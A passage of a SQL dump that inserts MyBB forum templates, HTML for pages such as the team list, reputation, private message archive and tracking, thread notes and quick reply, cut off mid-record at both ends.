cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"><strong>{$lang->moderators}</strong></td> </tr> <tr> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_username}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_forums}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_email}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->mod_pm}</strong></span></td> </tr> {$modrows} </table> <br/>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('152', 'showteam_moderators_mod', '<tr> <td width=\"50%\" class=\"trow1\"><a href=\"{$user[\'profilelink\']}\"><strong>{$user[\'username\']}</strong></a></td> <td width=\"30%\" class=\"trow2\"><span class=\"smalltext\">{$forumslist}</span></td> <td width=\"10%\" class=\"trow2\">{$emailcode}</td> <td width=\"10%\" class=\"trow1\">{$pmcode}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('153', 'report_noreason', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title> {$headerinclude} </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"center\"> <br /> <br /> <strong>{$lang->report_error}</strong> <blockquote>{$lang->no_reason}</blockquote> <br /><br /> <div> <script type=\"text/javascript\"> <!-- document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\'); document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\'); // --> </script> </div> </td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('154', 'reputation', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->reputation_report}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var delete_reputation_confirm = \"{$lang->delete_reputation_confirm}\"; // --> </script> </head> <body> {$header} {$add_reputation} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\"> <tr> <td class=\"thead\"><strong>{$lang->reputation_report}</strong></td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->summary}</strong></td> </tr> <tr> <td class=\"trow1\"> <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"> <tr> <td> <span class=\"largetext\"><strong>{$username}</strong></span><br /> <span class=\"smalltext\"> ({$usertitle})<br /> <br /> <strong>{$lang->total_reputation}:</strong> <span class=\"repbox {$total_class}\">{$user[\'reputation\']}</span><br /><br /> <strong>{$lang->reputation_members} {$rep_members}</strong><br /> <strong>{$lang->reputation_posts} {$rep_posts}</strong><br /> <strong class=\"reputation_positive\">{$lang->positive_count}:</strong> {$positive_count} {$pos_rep_info}<br /> <strong class=\"reputation_neutral\">{$lang->neutral_count}:</strong> {$neutral_count} {$neu_rep_info}<br /> <strong class=\"reputation_negative\">{$lang->negative_count}:</strong> {$negative_count} {$neg_rep_info} </span> </td> <td align=\"right\" style=\"width: 300px;\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder trow2\"> <tr> <td>&nbsp;</td> <td><span class=\"smalltext reputation_positive\">{$lang->positive_count}</span></td> <td><span class=\"smalltext reputation_neutral\">{$lang->neutral_count}</span></td> <td><span class=\"smalltext reputation_negative\">{$lang->negative_count}</span></td> </tr> <tr> <td style=\"text-align: right;\"><span class=\"smalltext\">{$lang->last_week}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$positive_week}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$neutral_week}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$negative_week}</span></td> </tr> <tr> <td style=\"text-align: right;\"><span class=\"smalltext\">{$lang->last_month}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$positive_month}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$neutral_month}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$negative_month}</span></td> </tr> <tr> <td style=\"text-align: right;\"><span class=\"smalltext\">{$lang->last_6months}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$positive_6months}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$neutral_6months}</span></td> <td style=\"text-align: center;\"><span class=\"smalltext\">{$negative_6months}</span></td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td class=\"tcat\"><strong>{$lang->comments}</strong></td> </tr> {$reputation_votes} <tr> <td class=\"tfoot\" align=\"right\"> <form action=\"reputation.php\" method=\"get\"> <input type=\"hidden\" name=\"uid\" value=\"{$user[\'uid\']}\" /> <select name=\"show\"> <option value=\"all\" {$show_selected[\'all\']}>{$lang->show_all}</option> <option value=\"positive\" {$show_selected[\'positive\']}>{$lang->show_positive}</option> <option value=\"neutral\" {$show_selected[\'neutral\']}>{$lang->show_neutral}</option> <option value=\"negative\" {$show_selected[\'negative\']}>{$lang->show_negative}</option> </select> <select name=\"sort\"> <option value=\"dateline\" {$sort_selected[\'last_updated\']}>{$lang->sort_updated}</option> <option value=\"username\" {$sort_selected[\'username\']}>{$lang->sort_username}</option> </select> {$gobutton} </form> </td> </tr> </table> {$multipage} {$footer} </body> </html>', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('155', 'misc_buddypopup', '<html> <head> <title>{$lang->buddy_list}</title> <meta http-equiv=\"refresh\" content=\"60; URL=misc.php?action=buddypopup\" /> {$headerinclude} <style type=\"text/css\"> body { text-align: left; } .buddy_avatar { height: 50px; width: 50px; background: #fff; border: 1px solid #ccc; float: left; clear: left; margin-right: 5px; text-align: center; } .buddy_details img { vertical-align: middle; } .buddy_action { margin-left: 80px; } </style> </head> <body style=\"margin:0; padding: 4px; top: 0; left: 0;\"> <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\"> <tr> <td class=\"thead\"> <div class=\"float_right\" style=\"margin-top: 3px;\"><span class=\"smalltext\"><a href=\"#\" onclick=\"window.close();\">{$lang->close}</a></span></div> <div><strong>{$lang->buddy_list}</strong></div> </td> </tr> <tr> <td class=\"trow2\"> <div style=\"overflow: auto; height: 300px;\"> <table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\" style=\"border: 0;\"> {$buddys[\'online\']} {$buddys[\'offline\']} </table> </div> </td> </tr> </table> </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('156', 'misc_buddypopup_user_offline', ' <tr> <td class=\"trow1\"> <div class=\"buddy_avatar\"><img src=\"{$buddy[\'avatar\']}\" alt=\"\" width=\"{$scaled_dimensions[\'width\']}\" height=\"{$scaled_dimensions[\'height\']}\" style=\"margin-top: {$margin_top}px;\" /></div> <div class=\"buddy_details\"> <img src=\"{$theme[\'imgdir\']}/buddy_offline.gif\" alt=\"{$lang->offline}\" title=\"{$lang->offline}\" /> {$profile_link} <div class=\"buddy_action\"> <span class=\"smalltext\">{$last_active}<br />{$send_pm}</span> </div> </div> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('157', 'misc_buddypopup_user_online', ' <tr> <td class=\"trow1\"> <div class=\"buddy_avatar\"><img src=\"{$buddy[\'avatar\']}\" alt=\"\" width=\"{$scaled_dimensions[\'width\']}\" height=\"{$scaled_dimensions[\'height\']}\" style=\"margin-top: {$margin_top}px;\" /></div> <div class=\"buddy_details\"> <img src=\"{$theme[\'imgdir\']}/buddy_online.gif\" alt=\"{$lang->online}\" title=\"{$lang->online}\" /> {$profile_link} <div class=\"buddy_action\"> <span class=\"smalltext\">{$last_active}<br />{$send_pm}</span> </div> </div> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('158', 'private_archive_txt', '{$lang->private_messages_for} ({$lang->exported_date}) {$pmsdownload}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('159', 'postbit_avatar', '<a href=\"{$post[\'profilelink_plain\']}\"><img src=\"{$post[\'avatar\']}\" alt=\"\" {$avatar_width_height} /></a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('160', 'usercp_profile_customfield', '<tr> <td> <a title=\"{$profilefield[\'description\']}\" style=\"text-decoration: none;\">{$profilefield[\'name\']}</a>: <br /> <span class=\"smalltext\">{$profilefield[\'description\']}</span> </td> </tr> <tr> <td>{$code}</td> </tr> ', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('161', 'usercp_profile_profilefields', '<br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->additional_information}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> {$customfields} </table> </fieldset>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('162', 'private_archive', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->archive_messages}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->archive_messages}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\">{$lang->archive_note}</span></td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"30%\"><strong>{$lang->folders}</strong></td> <td class=\"trow1\">{$folderlist}</td> </tr> <tr> <td class=\"trow2\" valign=\"top\" width=\"30%\"><strong>{$lang->date_limit}</strong></td> <td class=\"trow2\"><select name=\"dayway\"><option value=\"older\">{$lang->date_limit_older}</option><option value=\"newer\">{$lang->date_limit_newer}</option><option value=\"disregard\">{$lang->date_limit_disregard}</option></select> <input type=\"text\" class=\"textbox\" name=\"daycut\" value=\"30\" size=\"3\" maxlength=\"4\" /> {$lang->date_limit_days}</td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"30%\"><strong>{$lang->export_unread}</strong></td> <td class=\"trow1\"><input type=\"radio\" class=\"radio\" name=\"exportunread\" value=\"1\" /> {$lang->yes} <input type=\"radio\" class=\"radio\" name=\"exportunread\" value=\"0\" checked=\"checked\" /> {$lang->no} </td> </tr> <tr> <td class=\"trow2\" valign=\"top\" width=\"30%\"><strong>{$lang->delete_archived}</strong><br /><span class=\"smalltext\">{$lang->delete_archived_note}</span></td> <td class=\"trow2\"><input type=\"radio\" class=\"radio\" name=\"deletepms\" value=\"1\" /> {$lang->yes} <input type=\"radio\" class=\"radio\" name=\"deletepms\" value=\"0\" checked=\"checked\" /> {$lang->no} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\" width=\"30%\"><strong>{$lang->export_format}</strong><br /><span class=\"smalltext\">{$lang->export_format_note}</span></td> <td class=\"trow1\"><input type=\"radio\" class=\"radio\" name=\"exporttype\" value=\"html\" checked=\"checked\" /> {$lang->export_html}<br /><input type=\"radio\" class=\"radio\" name=\"exporttype\" value=\"txt\" /> {$lang->export_txt}<br /><input type=\"radio\" class=\"radio\" name=\"exporttype\" value=\"csv\" /> {$lang->export_csv}</td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_export\" /> <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->archive_messages}\" /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('163', 'private_folders_folder', '<tr> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"folder[{$fid}]\" size=\"25\" value=\"{$foldername}\" maxlength=\"30\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('164', 'private_folders_folder_unremovable', '<tr> <td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"folder[{$fid}]\" size=\"25\" value=\"{$foldername}\" maxlength=\"30\" /> <span class=\"smalltext\">({$foldername2} - {$lang->cannot_be_removed})</span> </td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('165', 'showteam_usergroup_user', '<tr> <td width=\"80%\" class=\"{$bgcolor}\"><a href=\"{$user[\'profilelink\']}\"><strong>{$user[\'username\']}</strong></a></td> <td width=\"10%\" class=\"{$bgcolor}\">{$emailcode}</td> <td width=\"10%\" class=\"{$bgcolor}\">{$pmcode}</td> </tr>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('166', 'showteam_moderators_forum', '<a href=\"{$forum_url}\">{$forum[\'name\']}</a><br/>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('167', 'moderation_inline_deleteposts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->delete_posts}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_posts}</strong></td> </tr> <tr> <td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_posts}</td> </tr> {$loginbox} </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_posts}\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_multideleteposts\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"posts\" value=\"{$inlineids}\" /> <input type=\"hidden\" name=\"url\" value=\"{$return_url}\" /> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('168', 'online_today', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->online_today}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->on_username}</strong></span></td> <td class=\"thead\" align=\"center\" width=\"50%\"><span class=\"smalltext\"><strong>{$lang->time}</strong></span></td> </tr> {$todayrows} <tr> <td align=\"center\" colspan=\"2\" class=\"trow1\" style=\"white-space: nowrap\">{$onlinetoday}</td> </tr> </table> <br /> {$multipage} {$footer} </body> </html>', '-2', '1604', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('169', 'forumdisplay_thread_modbit', '<td class=\"{$bgcolor}\" align=\"center\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$multitid}\" id=\"inlinemod_{$multitid}\" value=\"1\" {$inlinecheck} /></td>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('170', 'forumdisplay_thread_gotounread', '<a href=\"{$thread[\'newpostlink\']}\"><img src=\"{$theme[\'imgdir\']}/jump.gif\" alt=\"{$lang->goto_first_unread}\" title=\"{$lang->goto_first_unread}\" /></a> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('171', 'private_tracking', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->pm_tracking}</title> {$headerinclude} </head> <body> {$header} <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$read_multipage} <form action=\"private.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_tracking\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->read_messages}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->sentto}</strong></span></td> <td class=\"tcat\" align=\"right\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->dateread}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1%\"><span class=\"smalltext\"><input type=\"checkbox\" class=\"checkbox checkall\" /></span></td> </tr> {$readmessages} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"5\"><strong><input type=\"submit\" class=\"button\" name=\"stoptracking\" value=\"{$lang->stop_tracking}\" /> {$lang->selected_messages}</strong></td> </tr> </table> </form> <br /> {$unread_multipage} <form action=\"private.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_tracking\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" align=\"center\" colspan=\"5\"><strong>{$lang->unread_messages}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td> <td class=\"tcat\" align=\"center\" style=\"white-space: nowrap\" width=\"30%\"><span class=\"smalltext\"><strong>{$lang->sentto}</strong></span></td> <td class=\"tcat\" align=\"right\" style=\"white-space: nowrap\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->datesent}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input type=\"checkbox\" class=\"checkbox checkall\" /></span></td> </tr> {$unreadmessages} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"5\"><strong><input type=\"submit\" class=\"button\" name=\"stoptrackingunread\" value=\"{$lang->stop_tracking}\" /> / <input type=\"submit\" class=\"button\" name=\"cancel\" value=\"{$lang->cancel}\" /> {$lang->selected_messages}</strong></td> </tr> </table> </form> </td></tr></table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('172', 'moderation_threadnotes', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->thread_notes_editor}</title> {$headerinclude} </head> <body> {$header} <form action=\"moderation.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->thread_notes_editor}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\" colspan=\"2\">{$lang->below_notes}</td> </tr> <td class=\"trow1\" align=\"center\" colspan=\"2\"><textarea name=\"threadnotes\" cols=\"80\" rows=\"10\" tabindex=\"1\">{$thread[\'notes\']}</textarea></td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_notes}\" tabindex=\"2\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_threadnotes\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> </form> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"><strong>{$lang->mod_logs}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_username}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_date}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_actions}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_information}</strong></td> </tr> {$modactions} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"><strong>{$lang->delayed_mod_queue}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_username}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->days_to_perform_action}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_actions}</strong></td> <td class=\"tcat\" align=\"center\"><strong>{$lang->mod_information}</strong></td> </tr> {$delayedmods} </table> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('173', 'error_maxpostimages', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->error_too_many_images}</strong></td> </tr> <tr> <td class=\"trow1\">{$lang->error_too_many_images2}<br /><span class=\"smalltext\">{$lang->error_too_many_images3} {$mybb->settings[\'maxpostimages\']}.</span> </td> </tr> </table> <br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('174', 'private_archive_html', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->private_messages_for}</title> <style type=\"text/css\">{$css} * {text-align: left}</style> </head> <body> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"1\"><span class=\"largetext\"><strong>{$lang->private_messages_for}</strong></span></td> </tr> {$pmsdownload} </table> <br /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" colspan=\"1\">{$lang->exported_date}<br /><a href=\"{$mybb->settings[\'bburl\']}\">{$mybb->settings[\'bbname\']}</a></td> </tr> </table> </body>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('175', 'private_messagebit', '<tr> <td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/{$msgfolder}\" alt=\"{$msgalt}\" title=\"{$msgalt}\" /></td> <td align=\"center\" class=\"trow2\" width=\"1%\">{$icon}</td> <td class=\"trow1\" width=\"35%\">{$msgprefix}<a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}\">{$message[\'subject\']}</a>{$msgsuffix}{$denyreceipt}</td> <td align=\"center\" class=\"trow2\">{$tofromusername}</td> <td class=\"trow1\" align=\"right\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$senddate} {$sendtime}</span></td> <td class=\"trow2\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"check[{$message[\'pmid\']}]\" value=\"1\" /></td> </tr>', '-2', '128', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('176', 'private_search_messagebit', '<tr> <td align=\"center\" class=\"trow1\" width=\"1%\"><img src=\"{$theme[\'imgdir\']}/{$msgfolder}\" alt=\"{$msgalt}\" title=\"{$msgalt}\" /></td> <td align=\"center\" class=\"trow2\" width=\"1%\">{$icon}</td> <td class=\"trow1\" width=\"35%\">{$msgprefix}<a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}\">{$message[\'subject\']}</a>{$msgsuffix}{$denyreceipt} <br />{$message[\'message\']}</td> <td align=\"center\" class=\"trow2\">{$tofromusername}</td> <td align=\"center\" class=\"trow1\"><a href=\"private.php?fid={$message[\'folder\']}\">{$foldername}</a></td> <td class=\"trow2\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\">{$senddate} {$sendtime}</span></td> <td class=\"trow1\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"check[{$message[\'pmid\']}]\" value=\"1\" /></td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('177', 'private_multiple_recipients', '<a href=\"private.php?action=read&amp;pmid={$message[\'pmid\']}\" id=\"private_message_{$message[\'pmid\']}\">{$lang->multiple_recipients}</a> <div id=\"private_message_{$message[\'pmid\']}_popup\" class=\"popup_menu\" style=\"display: none;\"><div class=\"tcat\"><strong>{$lang->to}</strong></div>{$to_users}{$bcc_users}</div> <script type=\"text/javascript\"> <!-- new PopupMenu(\"private_message_{$message[\'pmid\']}\"); // --> </script>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('178', 'private_multiple_recipients_user', '<div class=\"popup_item_container\"><a href=\"{$profilelink}\" class=\"popup_item\">{$username}</a></div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('179', 'private_multiple_recipients_bcc', '<div class=\"tcat\"><strong>{$lang->bcc}</strong></div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('180', 'private_nomessages', '<tr> <td colspan=\"6\" class=\"trow1\">{$lang->nomessages}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('181', 'private_search_results_nomessages', '<tr> <td colspan=\"7\" class=\"trow1\">{$lang->nomessages}</td> </tr>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('182', 'codebuttons', '<script type=\"text/javascript\" src=\"jscripts/editor.js?ver=1600\"></script> <script type=\"text/javascript\"> <!-- {$editor_language} var clickableEditor = new messageEditor(\"{$bind}\", {lang: editor_language, rtl: {$lang->settings[\'rtl\']}, theme: \"{$theme[\'editortheme\']}\"}); if(clickableEditor) { clickableEditor.bindSmilieInserter(\"clickable_smilies\"); } // --> </script>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('183', 'showthread_quickreply', '<br /> <form method=\"post\" action=\"newreply.php?tid={$tid}&amp;processed=1\" name=\"quick_reply_form\" id=\"quick_reply_form\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"subject\" value=\"RE: {$thread[\'subject\']}\" /> <input type=\"hidden\" name=\"action\" value=\"do_newreply\" /> <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" id=\"posthash\" /> <input type=\"hidden\" name=\"quoted_ids\" value=\"\" id=\"quoted_ids\" /> <input type=\"hidden\" name=\"lastpid\" id=\"lastpid\" value=\"{$last_pid}\" /> <input type=\"hidden\" name=\"from_page\" value=\"{$page}\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"method\" value=\"quickreply\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <thead> <tr> <td class=\"thead\" colspan=\"2\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'quickreply\']}.gif\" id=\"quickreply_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><strong>{$lang->quick_reply}</strong></div> </td> </tr> </thead> <tbody style=\"{$collapsed[\'quickreply_e\']}\" id=\"quickreply_e\"> <tr> <td class=\"trow1\" valign=\"top\" width=\"22%\"> <strong>{$lang->message}</strong><br /> <span class=\"smalltext\">{$lang->message_note}<br /><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" 